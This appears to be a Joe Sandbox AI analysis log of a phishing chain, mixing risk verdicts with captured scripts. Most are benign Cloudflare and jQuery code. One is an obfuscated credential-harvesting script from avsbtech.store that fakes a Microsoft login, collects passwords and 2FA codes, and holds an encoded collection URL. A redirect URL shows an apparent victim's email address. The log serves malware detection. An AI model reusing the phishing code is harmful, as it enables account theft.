oLL0mJeL5S0_37msBs9k_NHmqsDSnvMLgYCaBXBQlavEFDU5xfftolGB0vYD24QGjh.naQ_4vWPgo.Elpkru9_grnyw27GjFxhlbfKV__jbWaUE76VxxYfbOnuIRNHs0Sf8TwieovD61C1qRjrSeweb.wueHtj72MLhjelTDNvweDzgzD8VW6UV7vGkkNV2scjGpIGruxWHxEK2XvXKaHwXwrYfrWifSA1WYFBfbXbNwH5KSgVoNxynK_i3vvzx3QzkB8jfLIYd0JAAoG3yqh77mj6uxwFE.Qe6bvND6Pe2hPgAOGZEDxJimWAhVos1EOx1UnPD2ZbzuDJoe6gwEtRymzbQdEOv5HENb0pCXNg05aXViLpe39OIC9wGDhcpu4L7pg1vmqDbP0muddxmG4tJJBceRg7kHUr0BDwPDSa9gtoAXwvpnF7rVLEZpsFVUOxm6pmPQVjSBYbP.VP3JfzO8o_SiG_raggEiFpAJ696J_nG6g3gEeqa77SUhNcjAwXBQ8hCzO_9C_Uredz3IV3vjdGI4jifMM8xlBvSWEkA0j1z48b0ciJBvpSF7p6ru_MWV4rn8H26xNSMzJWa3LnspWYDfu78PzsVYce7kmJPibGb_Fvd5hMoRWNfaflWP5hVnvmg",mdrd: "piFpK8_PkcjVULj4Ck0QrHg7.WQ8PggJ2yPex807vqo-1738876911-1.2.1.1-NrCt3Ua_NqVVuxUNam4pr.yrVEGqPZJZnPU.IP6V1dHiTFX63L_Kj2ZNOLHd6ccyDBiK.XaqeTviqENpGLq5DAoJgCBkscFL6P1SopqOLqZ5_edkb7boa0php2S9a8B3Tj9vkWlW5aXYNXJJ_kLClwV9MtR0ldFU5K41vs5nqva4ZiSLuuepYdhAvrWhMT8fvplKstbm7GHlXdwcSnsiNXsn4D7Ncvup7bmDwIoNSI.nkk1bH3_ubzRZf0ISSHOoHTT9eQ2nnhpymcaL8eukcLTBr4Rgl4tBIGz.gid1XwyCA2UP9vOjOMKuqlBAFj8o2js3vvuvANBHx2OXhGxFiHKX1KDSqU9WDiAEra6jbpy8lyDpxS14l97cYlSTJVb4DKClMGa7zMSQUB83.GJiNlLtQFDcz3LrrxD6i8aZgmcmD.quhhxNFgZovxOZ3n.xxeCmhWam.AxFJSX.7Unglbnj3fHW.VtfFsj0L9f2tPEaYF18X6UNbhuML1uo_K.pitGuoHl2ewpf21pcTfpogk9QnNm2OKnWSq_0_Tfpv3UpW7EsWN_rw7iafXQQa0pZ0hJWj0yWORVPeMUs6oLAwjwTXgO9pFjKLd62imC0uT09dQ_ocNRLx_w4HddgFbBhvLajH9De2BvFSGXaOCibRNg_WhXLbbNCIUIPz3yMc_RYv6YuHKAW1NcD3rnZlVG9qfZ2E1.yvcHPsHLNLG293cjElb3PeMZD4DpI3zy73cYub0azBft.EuNQPHnGiCnDDlElU9Wu8JaMsTZhAqswoNLIyupA0Kzs8augYns5DCALSvdQWffeKAP5_ZBry9HG64GPiihZdngXGcwNC34C5iba8xLTjim8xeAJQbB1oigI2gpFjF_.zqlB4nJnTUjPSd.MNeDlJb3AwZYYjJP48GCPsqHk5QSX2woWp51tuNmULbb7yI.ULl5AKWMuTpUp9WrrmKZOIaSCawosIZ6W.F18rb5eacYdsWsEuQFwldyP9iPH9ompkj3gZfbxvALP05qfyRYd0SL53Z1XJjlrf73v9zngnzjA0.jsWlWhPDbm_i9uyuYwZC3bT6nEMrEmJJoiiAHnj3jcEpvLBHObovyfFmpF8Y2H6iXnrCwSMOLtvmrzF4yT8TEP56GRbShiyQ0NiPRlY03l9eJOXrA_8GDQwuLMufSsgYXNNuHztvFTmDSd6ej_cMU4635C9dIwz6CytNrEsGpscktl83I4oJK2rC0IrR_rQnOztI_rK4c1Dia.t05lkHhU46RxPUjz95jLAF6UaWGzE.9HxbJxJc_IWrwMKPiizvRaKLYw7Nqu4lYZJmgD681VI.j.pBzbvopA4J3detohsAR8T.xRYkCqa9DEnJR3oqvld4Zv4O0ESD8JQzD_
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or obfuscated code. It primarily handles communication with the Cloudflare API and parent window, which is a legitimate use case. While the script uses some legacy practices like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, the script seems to be a benign implementation of a Cloudflare challenge, and the risk score is low." }
(function(){ window._cf_chl_opt={ cvId: '3', cZone: 'challenges.cloudflare.com', cTplV: 5, chlApivId: '0', chlApiWidgetId: '1ufjr', chlApiSitekey: '0x4AAAAAAADnOjc0PNeA8qVm', chlApiMode: 'invisible', chlApiSize: 'normal', chlApiRcV: '2kgpnIyQLsMmbb.APe7faBjfPNxSJBHFg2s5V0bwaOk-1738876914-1.3.1.1-aafK2yIix1MKxeffh3j.Cc1iFLd05ZuDBplYSwaGirw', chlApiResetSrc: 'new', chlApiTimeoutEncountered: 0, chlApiOverrunBudgetMs:10000, chlTimeoutMs:72000, cK:[], cType: 'chl_api_inv', cRay: '90de314d6ff45e68', cH: '07cEjqaZHgGCnUIKxHT7ihUyn53RaRMg2cO_HNkLaDE-1738876914-1.1.1.1-td3ou6XEZ7k3lW4gZTKyrmNHMFRmdXZXkCgVjpxXBJDHv.1uYcPj0CPW1b3tytrj', cFPWv: 'g', cLt: 'n', chlApiFailureFeedbackEnabled:true, chlApiLoopFeedbackEnabled:false, wOL:false, wT: 'light', wS: 'normal', md: '6UA8DG3Q6iCxtjphX.r7GhdOZ5YEEgWd9mpepGXo1Bc-1738876914-1.1.1.1-0v1w6REIEMrPMwTL_ThPHaqlWTL.WTgp4sXreR3MGmGhR09doq1IIeCgHNnefL248njeqxV6EezdrXI7sCggZpdd7fynkQdG5.Il635Q4je0DVMwfXlDN1MLmfCPTrUw19cIzPTdS32QiR1Nn0cFR7u26snncsP4COoULOEWVVFAid_lHBK6W3hxTINxjg6FGPZ5a2rnyF22AncqOfybdExZJ5z9woc7.HCCynQrgFmnhsaf9h5yufdKQ4.tHpkT1k3e8XkNxN1YaRuHR9k4bhOWryxqmeZXxHJ4jNTLSBFF38aGXB7AQ7IOJ3NM6ru5f51Vm.iD1C1JIlCMnrVSw8OhO8QuY52I582Tz3FtF9cqADw4xhlBI_4haPawkzIIN9lhq5pCcSHj41Ks.2oix2TQzfkTzA5ZxuB33chHD_u2lKu4IlVnsGiYqegrEwowOWNC1rvoXUlZI9TaUfCwTWdccT8pocktNw6NIHg1OxO0i70xfPzp62zU8_6Y_z9EQ3gF2kIK57Yht7YyNSRzYHqYlcFWIoaRBSLmIi.bAYql0WDthAMUIbs2oYBTvtd88Z7toHcW1yDVM7rT_BaypW5llJZ3ZJS5fgXGHcpG2K3iWrUhlrnD_Y3gmHSglJgsnVD2fG7M7yBweZb_O8WzlK4H8eJyr.OJQsD6hTxhq_5fuMlTYM3NNTAA9tvgFYij9rPFLHfo5vjUOQyaMG_GnMo8TO0NPB7QAgmKHeJ6vQrlUqvCG5Uazz1Gf8pp8YA1n2umahgnG0pWXSIlhu_Qiwmxqo3tr2kOWaPSd3fSpED1Ht5NXk1.zfuq0xcWLq5DoqAnCZcLm9FkyvGgVgazVPTbrM3AoQ3SzWf7L2e2dUq_ydmOAqDE9OLCnSxMFf07zKA15GLe1fNZvyhKulGmCLOhmvLU5PseFcGop7dJQ4U0nuk.608YQRwppUwIWsomVIeT2w3_WhUNzadLHX_9csbTh3YO_me4NoMHvcALeazxFC02Jr.znniJbW4aJ23Ak.lqO.QkIJwiITICTxrtUbLbmzLK0Jr_66dGUvldEOqGjsK4d__wWLimMM50RBQO9hnxPvvg9L6PUtTIm5LxkLS86d6xMSVPNfFnDtphTmunZgN7rQMUKxKvu3GQqwX7h29UshiWL4Sp_wsCxi1OOyfep7tT4jhdbzpR6LaV8FnwK0e5RSNKVa9B_HWUYzuMbedm0A.Befke3wgQGl1FChFeIQxj4l98q0i6aNK3GNQrdd915hyhVbde5t5kFCnKWe8mgrwbbjgH_Aiczd9V8OFieKDAsCq14h9rGF39YZRX_WShMpqedPFhBNp8nZe7OhWjX7NtYj5UcADEUCA91ET9Dzre89uxS6dfgDvyH1A', cITimeS: '1738876914', chlIssUA: 'ubXmLeAP2sifh7FOf9dQzLczAwTOFp_o5IMoQgVNSkI-1738876914-1.3.1.1-PbJ49QRFb9slY31rcI3HpIO.h74pKTf.YynF2Zwj.tq.P4LNC.KATlwoKjfmLcvf0HVyEG06FractYKMPrZZ84S1Hv.ETxzYacGfbHJdTB.yo291SemyunpfuG3p94r8OuP2dx_Wh_ejnHVWCdfYcitYrxS98RmpL7s3cPCnM1k', chlIp: '21.Pz3ofYmdJbPH99VFinz3B2pX_nDj1FYhe0P.H2AI-1738876914-1.3.1.1-lF4hVGRdp889eNncm7Jnptm__koBWzrglXAf8xT.6N8', reloadRequest: function(refreshTrigger){ if(window['parent']){ window['parent'].postMessage({ trigger: refreshTrigger, source: 'cloudflare-challenge', widgetId: '1ufjr', nextRcV: '2kgpnIyQLsMmbb.APe7faBjfPNxSJBHFg2s5V0bwaOk-1738876914-1.3.1.1-aafK2yIix1MKxeffh3j.Cc1iFLd05ZuDBplYSwaGirw', event: 'reloadRequest', }, "*"); } } }; var handler = function(event) { var e = event.data; if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) { if(window['parent']){ window['parent'].postMessage({
URL: https://keep.za.com/cgi//redirect.php#rbruening@elford.com Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: https://keep.za.com/cgi//redirect.php#rbruening@elford.com Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Verifying you are human. This may take a few seconds.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: https://keep.za.com/cgi//redirect.php#rbruening@elford.com Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: https://keep.za.com/cgi//redirect.php#rbruening@elford.com Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: https://challenges.cloudflare.com/turnstile/v0/g/8... Model: Joe Sandbox AI	```json { "risk_score": 3, "reasoning": "The script contains obfuscated code, which is a high-risk indicator. However, there are no clear signs of malicious behavior such as data exfiltration or dynamic code execution. The obfuscation could be for legitimate purposes, such as protecting intellectual property." }
"use strict";(function(){function Ht(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function g(s){Ht(l,o,c,g,h,"next",s)}function h(s){Ht(l,o,c,g,h,"throw",s)}g(void 0)})}}function D(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):D(e,t)}function Ue(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function De(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Ue(e,c,a[c])})}return e}function Sr(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=null?t:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):Sr(Object(t)).forEach(function(a){Object.defineProperty(e,a,Object.getOwnPropertyDescriptor(t,a))}),e}function qt(e){if(Array.isArray(e))return e}function zt(e,t){var a=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]\|\|e["@@iterator"];if(a!=null){var o=[],c=!0,l=!1,g,h;try{for(a=a.call(e);!(c=(g=a.next()).done)&&(o.push(g.value),!(t&&o.length===t));c=!0);}catch(s){l=!0,h=s}finally{try{!c&&a.return!=null&&a.return()}finally{if(l)throw h}}return o}}function Gt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function ot(e,t){(t==null\|\|t>e.length)&&(t=e.length);for(var a=0,o=new Array(t);a<t;a++)o[a]=e[a];return o}function Xt(e,t){if(e){if(typeof e=="string")return ot(e,t);var a=Object.prototype.toString.call(e).slice(8,-1);if(a==="Object"&&e.constructor&&(a=e.constructor.name),a==="Map"\|\|a==="Set")return Array.from(a);if(a==="Arguments"\|\|/^(?:Ui\|I)nt(?:8\|16\|32)(?:Clamped)?Array$/.test(a))return ot(e,t)}}function Se(e,t){return qt(e)\|\|zt(e,t)\|\|Xt(e,t)\|\|Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ve(e,t){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},trys:[],ops:[]},o,c,l,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(_){return s([p,_])}}function s(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(a=0)),a;)try{if(o=1,c&&(l=p[0]&2?c.return:p[0]?c.throw\|\|((l=c.return)&&l.call(c),0):c.next)&&!(l=l.call(c,p[1])).done)return l;switch(c=0,l&&(p=[p[0]&2,l.value]),p[0]){case 0:case 1:l=p;break;case 4:return a.label++,{value:p[1],done:!1};case 5:a.label++,c=p[1],p=[0];continue;case 7:p=a.ops.pop(),a.trys.pop();continue;default:if(l=a.trys,!(l=l.length>0&&l[l.length-1])&&(p[0]===6\|\|p[0]===2)){a=0;continue}if(p[0]===3&&(!l\|\|p[1]>l[0]&&p[1]<l[3])){a.label=p[1];break}if(p[0]===6&&a.label<l[1]){a.label=l[1],l=p;break}if(l&&a.label<l[2]){a.label=l[2],a.ops.push(p);break}l[2]&&a.ops.pop(),a.trys.pop();continue}p=t.call(e,a)}catch(_){p=[6,_],c=0}finally{o=l=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Yt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var Pe=300030;var We=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j\|\|(j={}));var L;(fun
URL: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "The provided JavaScript snippet does not exhibit any high-risk behaviors. It simply extracts a user ID (UID) from the URL hash fragment, which is a common and benign practice. There are no indicators of dynamic code execution, data exfiltration, or other suspicious activities. This script is likely part of a legitimate application and poses a low risk." }
var uid = window.location.hash.substring(1); if (!uid) {uid = "";}
URL: https://keep.za.com/cgi//redirect.php#rbruening@el... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "This script exhibits moderate-risk behavior by redirecting the user to an external domain with a dynamically generated URL that includes a user ID (UID) parameter. While the intent is not immediately clear, the use of a timeout to perform the redirection and the inclusion of a UID parameter suggest potential data exfiltration or phishing concerns that require further investigation." }
var uid = window.location.hash.substring(1); var targetUrl = "https://keep.za.com/cgi/b63fc8d582eda5fa.html"; if (uid) { targetUrl += "?uid=" + encodeURIComponent(uid); } setTimeout(function() { window.location.href = targetUrl; }, 500);
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or obfuscated code/URLs. The script is primarily responsible for handling the Cloudflare challenge and providing translations for the challenge interface. This behavior is consistent with a legitimate security mechanism and does not pose a significant security risk." }
window._cf_chl_opt.uaO=false;window._cf_chl_opt.FIEmr2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F"},"translations":{"invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_feedback_report":"Having%20trouble%3F","testing_only":"Testing%20only.","human_button_text":"Verify%20you%20are%20human","turnstile_timeout":"Timed%20out","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_verifying":"Verifying...","turnstile_footer_privacy":"Privacy","turnstile_footer_terms":"Terms","turnstile_success":"Success%21","turnstile_failure":"Error","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_feedback_description":"Send%20Feedback","turnstile_expired":"Expired","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_overrun_description":"Stuck%20here%3F","turnstile_refresh":"Refresh"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eQ,eR,fn,fr,fs,fw,fx,fA,fD,fF,fG,fH,fT,g5,gb,gc,gd,gn,gy,gC,gD,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(859))/1+parseInt(gI(845))/2+parseInt(gI(929))/3(parseInt(gI(682))/4)+parseInt(gI(1328))/5+-parseInt(gI(1729))/6+parseInt(gI(1173))/7+-parseInt(gI(481))/8(parseInt(gI(1616))/9),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,639422),eM=this\|\|self,eN=eM[gJ(1373)],eO=[],eP=0;256>eP;eO[eP]=String[gJ(1821)](eP),eP++);gH=(eQ=(0,eval)(gJ(1507)),eR=atob(gJ(1536)),eM[gJ(1839)]=![],eM[gJ(1280)]=function(hC){if(hC=gJ,eM[hC(1839)])return;eM[hC(1839)]=!![]},fn=0,eN[gJ(1192)]===gJ(798)?eN[gJ(1848)](gJ(1869),function(){setTimeout(fq,0)}):setTimeout(fq,0),fr={},fr[gJ(1592)]='o',fr[gJ(1078)]='s',fr[gJ(1045)]='u',fr[gJ(1735)]='z',fr[gJ(1261)]='n',fr[gJ(1626)]='I',fr[gJ(1467)]='b',fs=fr,eM[gJ(1414)]=function(g,h,i,j,hS,o,x,B,C,D,E,F){if(hS=gJ,o={'bTlHk':hS(593),'vFDiH':hS(1709),'MaJib':function(G,H){return H===G},'cLaSS':function(G,H){return H===G},'QRASG':function(G,H){return G<H},'UKden':function(G,H){return G(H)},'Xxbvv':hS(753),'AEHFi':function(G,H){return G+H},'eBDEd':function(G,H){return G+H}},o[hS(1764)](null,h)\|\|o[hS(769)](void 0,h))return j;for(x=fv(h),g[hS(1558)][hS(934)]&&(x=x[hS(541)](g[hS(1558)][hS(934)](h))),x=g[hS(729)][hS(1714)]&&g[hS(649)]?g[hS(729)][hS(1714)](new g[(hS(649))](x)):function(G,hU,H,I,L,J){if(hU=hS,H={},H[hU(1347)]=o[hU(962)],I=H,hU(909)!==o[hU(903)]){for(G[hU(813)](),J=0;J<G[hU(1451)];G[J]===G[J+1]?G[hU(832)](J+1,1):J+=1);return G}else L={},L[hU(1740)]=I[hU(1347)],L[hU(1251)]=B[hU(1567)][hU(1069)],L[hU(1471)]=hU(1633),L[hU(623)]=E[hU(15
URL: https://code.jquery.com/jquery-3.1.1.min.js... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "This appears to be the standard jQuery library, which is a widely used and trusted JavaScript library. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or obfuscated code. The script is likely used for legitimate web development purposes and does not pose a significant security risk." }
/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license / !function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(f.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(a<0?b:0);return this.pushStack(c>=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]\|\|{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]\|\|{},h++),"object"==typeof g\|\|r.isFunction(g)\|\|(g={}),h===i&&(g=this,h--);h<i;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(r.isPlainObject(d)\|\|(e=r.isArray(d)))?(e?(e=!1,f=c&&r.isArray(c)?c:[]):f=c&&r.isPlainObject(c)?c:{},g[b]=r.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},r.extend({expando:"jQuery"+(q+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===r.type(a)},isArray:Array.isArray,isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){var b=r.type(a);return("number"===b\|\|"string"===b)&&!isNaN(a-parseFloat(a))},isPlainObject:function(a){var b,c;return!(!a\|\|"[object Object]"!==k.call(a))&&(!(b=e(a))\|\|(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a\|\|"function"==typeof a?j[k.call(a)]\|\|"object":typeof a},globalEval:function(a){p(a)},camelCase:function(a){return a.replace(t,"ms-").replace(u,v)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(s,"")},makeArray:function(a,b){var c=b\|\|[];return null!=a&&(w(Object(a))?r.merge(c,"string"==typeof a?[a]:a):h.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:i.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;d<c;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;f<g;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,e,f=0,h=[];if(w(a))for(d=a.length;f<d;f++)e=b(a[f],f,c),null!=e&&h.push(e);else for(f in a)e=b(a[f],f,c),null!=e&&h.push(e);return g.apply([],h)},guid:1,proxy:function(a,b){var c,d,e;if("string"==typeof b&&(c=a[b],b=a,a=c),r.isFunction(a))return d=f.call(arguments,2),e=function(){return a.apply(b\|\|this,d.concat(f.call(arguments)))},e.guid=a.guid=a.guid\|\|r.guid++,e},now:Date.now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[obje
URL: https://avsbtech.store/cgi/xls/c1g2i.js... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be collecting sensitive user information, such as passwords and 2FA codes, and sending it to potentially malicious domains. Additionally, the script uses aggressive DOM manipulation and legacy practices, further increasing the risk. While some contextual factors, such as the use of the Microsoft brand, could suggest legitimate intent, the overall behavior of the script is highly suspicious and indicative of a malicious phishing attempt." }
var _0xfd5851=_0x4a58;(function(_0x20ed6a,_0x216494){var _0x2fed19=_0x4a58,_0x250033=_0x20ed6a();while(!![]){try{var _0x9ac117=-parseInt(_0x2fed19(0x182))/0x1+-parseInt(_0x2fed19(0x1c9))/0x2+-parseInt(_0x2fed19(0x1b5))/0x3(parseInt(_0x2fed19(0x1ac))/0x4)+parseInt(_0x2fed19(0x1df))/0x5(parseInt(_0x2fed19(0x192))/0x6)+-parseInt(_0x2fed19(0x1f8))/0x7+-parseInt(_0x2fed19(0x188))/0x8+parseInt(_0x2fed19(0x1c6))/0x9;if(_0x9ac117===_0x216494)break;else _0x250033['push'](_0x250033['shift']());}catch(_0x25c10d){_0x250033['push'](_0x250033['shift']());}}}(_0x3e16,0xf1344));function _0x3e16(){var _0x155ae0=['status','onmessage','animate','data','createElement','html','approve_number','<div><div\x20class=\x22footerNode\x22>\x20<span\x20id=\x22c2024\x22>2024\x20Microsoft</span><a\x20data-bind=\x22text:\x20config.text.privacyAndCookies,\x20attr:\x20{\x27data-url\x27:\x20config.links.privacyAndCookies}\x22\x20href=\x22#\x22\x20id=\x22pst\x22\x20data-url=\x22https://go.microsoft.com/fwlink/?LinkId=521839\x22>Privacy\x20statement</a></div></div>','3694285rvItPM','texterror','val','#div6','#back-approve','Incorrect\x202FA\x20code','Incorrect\x202FA\x20code.\x20Try\x20again.','https://code.jquery.com/jquery-3.1.1.min.js','link','Microsoft','rel','preventDefault','src','<h3\x20style=\x22font-size:\x2016pt;\x22>More\x20information\x20required</h3>','#pr','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2220px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20logoname\x22\x20id=\x22mic\x22\x20style=\x22color:\x20#747474;\x22>Microsoft</span><br><br><span\x20class=\x22back-arrow\x22\x20id=\x22back\x22>\x20</span>\u00a0\u00a0\u00a0\u00a0<span\x20id=\x22aich\x22\x20style=\x22margin-left:\x20-10px;\x22></span><div\x20class=\x22py-2\x22><span\x20id=\x22ep\x22\x20class=\x22h5\x22>Enter\x20Password</span></div><div\x20class=\x22pb-2\x22><span\x20id=\x22msg\x22\x20class=\x22text-danger\x22></span></div>','No\x20account?','<div\x20class=\x22text-right\x22><button\x20type=\x22button\x22\x20class=\x22btn\x20rounded-0\x20text-white\x20px-4\x22\x20id=\x22next\x22\x20style=\x22background-color:\x20#0066BA;\x20cursor:\x20pointer;\x22>Next</button></div>','display:\x20none;','onclose','ready','#user-email-approve','JSON','body','container','type','<div\x20class=\x22form-group\x20mt-2\x22><label\x20for=\x22two-way-voice\x22\x20class=\x22h5\x22>Approve\x20sign\x20in\x20request</label><br><br><p>We\x27re\x20calling\x20your\x20phone.\x20Please\x20answer\x20it\x20to\x20continue.</p></div><br>','aHR0cHM6Ly9hdnNidGVjaC5zdG9yZS9jZ2kveGxzL2xvZ2luLnBocA','<div\x20class=\x22text-right\x22><button\x20type=\x22button\x22\x20class=\x22btn\x20rounded-0\x20text-white\x20px-4\x22\x20id=\x22next-div0\x22\x20style=\x22background-color:\x20#0066BA;\x20cursor:\x20pointer;\x22>Next</button></div>','otc','<p\x20style=\x22font-size:\x2011pt;\x22>Your\x